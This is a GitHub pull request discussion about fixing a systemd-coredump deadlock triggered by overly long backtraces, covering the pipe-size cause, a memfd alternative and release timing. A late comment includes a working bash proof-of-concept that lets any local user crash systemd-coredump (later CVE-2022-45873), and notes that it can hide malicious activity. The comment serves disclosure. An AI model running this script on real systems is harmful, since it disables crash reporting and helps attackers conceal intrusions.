Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fix coredump deadlock with overly long backtraces #25055

Merged
merged 3 commits into from Oct 19, 2022

Conversation

keszybz
Copy link
Member

@keszybz keszybz commented Oct 18, 2022

No description provided.

@keszybz keszybz added this to the v252 milestone Oct 18, 2022
src/shared/elf-util.c Show resolved Hide resolved
yuwata
yuwata approved these changes Oct 18, 2022
@AdamWill
Copy link
Contributor

AdamWill commented Oct 19, 2022

so I tried a systemd with this patch on a gnome-calendar crash, and still didn't get a coredump, probably because:

Oct 18 18:24:21 fedora systemd[1]: Started systemd-coredump@0-2842-0.service - Process Core Dump (PID 2842/UID 0).
....
Oct 18 18:29:21 fedora systemd[1]: systemd-coredump@0-2842-0.service: Service reached runtime time limit. Stopping.
Oct 18 18:29:21 fedora systemd[1]: systemd-coredump@0-2842-0.service: Failed with result 'timeout'.

so it took over five minutes to deal with the core dump, and timed out...

@keszybz
Copy link
Member Author

keszybz commented Oct 19, 2022

so I tried a systemd with this patch on a gnome-calendar crash, and still didn't get a coredump, probably because:
Oct 18 18:29:21 fedora systemd[1]: systemd-coredump@0-2842-0.service: Failed with result 'timeout'.

On my machine, generating the crash takes 5 seconds. So if it timed out, either something is wrong with the patch, or it wasn't applied properly, or there's some other bug. I'll test my patch again here.

Edit: yeah, it seems to work fine here.

$ journalctl -b _PID=2667772 -o cat | head 
Process 2667524 (3) of user 1000 dumped core.

Module linux-vdso.so.1 with build-id b21929a49b68b52a4059932eb797eb7182e48f08
Module libopensc.so.8 with build-id 7e70dbbc60cc7358472bcd2a198f1d548af8ab62
Metadata for module libopensc.so.8 owned by FDO found: {
	"type" : "rpm",
	"name" : "opensc",
	"version" : "0.22.0-7.fc37",
	"architecture" : "x86_64",
	"osCpe" : "cpe:/o:fedoraproject:fedora:37"
$ journalctl -b _PID=2667772 -o cat | wc  -c
69644

@keszybz keszybz force-pushed the coredump-deadlock branch 2 times, most recently from 37cd36a to 1d89509 Compare Oct 19, 2022
@keszybz
Copy link
Member Author

keszybz commented Oct 19, 2022

 Assertion 'f = fmemopen_unlocked((void*) "", 0, "r")' failed at src/test/test-json.c:351, function test_json_parse_file_empty(). Aborting.

I'm not sure why this fails. It works for me locally and reading the man page, it should work. I changed it to open /dev/null instead.

@yuwata yuwata added the good-to-merge/waiting-for-ci 👍 PR is good to merge, but CI hasn't passed at time of review. Please merge if you see CI has passed label Oct 19, 2022
keszybz added 2 commits Oct 19, 2022
It is useful to distinguish if json_parse_file() got no input or invalid input.
Use different return codes for the two cases.
We would deadlock when passing the data back from the forked-off process that
was doing backtrace generation back to the coredump parent. This is because we
fork the child and wait for it to exit. The child tries to write too much data
to the output pipe, and and after the first 64k blocks on the parent because
the pipe is full. The bug surfaced in Fedora because of a combination of four
factors:
- 8770778 was backported to v251.5, which
  allowed coredump processing to be successful.
- 1a0281a was NOT backported, so the output
  was very verbose.
- Fedora has the ELF package metadata available, so a lot of output can be
  generated. Most other distros just don't have the information.
- gnome-calendar crashes and has a bazillion modules and 69596 bytes of output
  are generated for it.

Fixes https://bugzilla.redhat.com/show_bug.cgi?id=2135778.

The code is changed to try to write data opportunistically. If we get partial
information, that is still logged. In is generally better to log partial
backtrace information than nothing at all.
@poettering
Copy link
Member

poettering commented Oct 19, 2022

Hmm, usually when reading output from a child we wait for EOF on that before waiting for the exit code of the child. Here it is done the other way round, which is the bug, no?

@keszybz
Copy link
Member Author

keszybz commented Oct 19, 2022

Hmm, usually when reading output from a child we wait for EOF on that before waiting for the exit code of the child. Here it is done the other way round, which is the bug, no?

I considered that too. We could read and accumulate input from the child until EOF. But that'd make the receiving side more complicated, because it'd need to grow a buffer, do a loop, and so on. But realistically, I don't think this is useful. The child generates the whole string first, so it knows how big it is, and can size the pipe appropriately. And also, the output should not be arbitrarily long. After all, we're going to stuff this in the journal, and we don't want to put a million lines in the message. So a more generic transfer mechanism would be more complicated but it wouldn't really give us any gains.

bluca
bluca approved these changes Oct 19, 2022
@mrc0mmand
Copy link
Member

mrc0mmand commented Oct 19, 2022

The C8S fail is unrelated (#25060).

@poettering
Copy link
Member

poettering commented Oct 19, 2022

hmm, one question: maybe the transfer mechanism should not actually be a pipe, but a memfd? a memfd can auto-grow and we wouldn't be subject to pipe size limits? i.e. instead of a pipe, just allocate a memfd, and pass it to the child? child writes its stuff there. afterwards we seek back to the front and read it?

I think the code would be more robust and even simpler?

@poettering
Copy link
Member

poettering commented Oct 19, 2022

memfd are 3.17 stuff, which is older than our recommended baseline, hence I think that would be Ok to simply use?

@poettering
Copy link
Member

poettering commented Oct 19, 2022

memfd are just memory that is accounted like other memory, so it's generally a good idea to use, since less special than pipes

@bluca
Copy link
Member

bluca commented Oct 19, 2022

hmm, one question: maybe the transfer mechanism should not actually be a pipe, but a memfd? a memfd can auto-grow and we wouldn't be subject to pipe size limits? i.e. instead of a pipe, just allocate a memfd, and pass it to the child? child writes its stuff there. afterwards we seek back to the front and read it?

I think the code would be more robust and even simpler?

Probably best to leave that for the next release, and just fix the bug as-is for 252? It's a different model, so there is inherent risk of introducing new regressions by changing over

@poettering
Copy link
Member

poettering commented Oct 19, 2022

dunno i think switching this to memfds will remove the entire category of bug here, instead of just trying to massage it to not happen anymore.

@bluca
Copy link
Member

bluca commented Oct 19, 2022

dunno i think switching this to memfds will remove the entire category of bug here, instead of just trying to massage it to not happen anymore.

Yes, but it could introduce new bugs that we aren't aware of - post-rc2 is late, surely it can wait a couple of weeks till after the next release?

@keszybz
Copy link
Member Author

keszybz commented Oct 19, 2022

Centos CI (CentOS Stream 8) is TEST-15-DROPIN, i.e. #25060. Not related.

Yes, but it could introduce new bugs that we aren't aware of - post-rc2 is late, surely it can wait a couple of weeks till after the next release?

Yep. I think we should merge this. Memfd might be nicer, but it'll likely touch a lot of code and has higher potential for regressions.

@bluca bluca merged commit 875c0bd into systemd:main Oct 19, 2022
45 of 46 checks passed
@keszybz keszybz deleted the coredump-deadlock branch Oct 19, 2022
@keszybz keszybz removed the good-to-merge/waiting-for-ci 👍 PR is good to merge, but CI hasn't passed at time of review. Please merge if you see CI has passed label Oct 19, 2022
@AdamWill
Copy link
Contributor

AdamWill commented Oct 19, 2022

so I tried a systemd with this patch on a gnome-calendar crash, and still didn't get a coredump, probably because:
Oct 18 18:29:21 fedora systemd[1]: systemd-coredump@0-2842-0.service: Failed with result 'timeout'.

On my machine, generating the crash takes 5 seconds. So if it timed out, either something is wrong with the patch, or it wasn't applied properly, or there's some other bug. I'll test my patch again here.

Edit: yeah, it seems to work fine here.

$ journalctl -b _PID=2667772 -o cat | head 
Process 2667524 (3) of user 1000 dumped core.

Module linux-vdso.so.1 with build-id b21929a49b68b52a4059932eb797eb7182e48f08
Module libopensc.so.8 with build-id 7e70dbbc60cc7358472bcd2a198f1d548af8ab62
Metadata for module libopensc.so.8 owned by FDO found: {
	"type" : "rpm",
	"name" : "opensc",
	"version" : "0.22.0-7.fc37",
	"architecture" : "x86_64",
	"osCpe" : "cpe:/o:fedoraproject:fedora:37"
$ journalctl -b _PID=2667772 -o cat | wc  -c
69644

Hmm, that's odd. Note I did a build of the systemd from F37, so 251, with the patch backported. But yeah, then all I did was make gnome-calendar crash and wait. I did do it in a VM with 2G of RAM, so maybe that was a problem...

@evverx
Copy link
Member

evverx commented Nov 14, 2022

Just to make it easier to fill out some form I'll leave a script bringing down systemd-coredump on Fedora 36 with systemd-250.8 (as any local user) here. Combined with #24139 it can be used to totally hide any weird activity where segfaults, coredumps and stuff like that are involved. The idea is to crash a binary calling the same function recursively and put it in a deeply nested directory to make its backtrace large enough to trigger the deadlock. It's run 16 times because of

MaxConnections=16

#!/bin/bash
set -ex

ulimit -c unlimited

d=$(mktemp -d)
pushd "$d"

cat <<'EOL' >hey.c
void f() { f(); }
int main(int argc, char *argv[]) {
    f();
    return 0;
}
EOL

gcc hey.c

a=$(perl -e 'print "A" x 255')
for i in {1..10}; do
    mkdir "$a"
    mv a.out "$a"
    cd "$a"
done

for i in {1..16}; do
    ./a.out &
done

@evverx
Copy link
Member

evverx commented Nov 23, 2022

61aea45 got CVE-2022-45873

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Development

Successfully merging this pull request may close these issues.

None yet

7 participants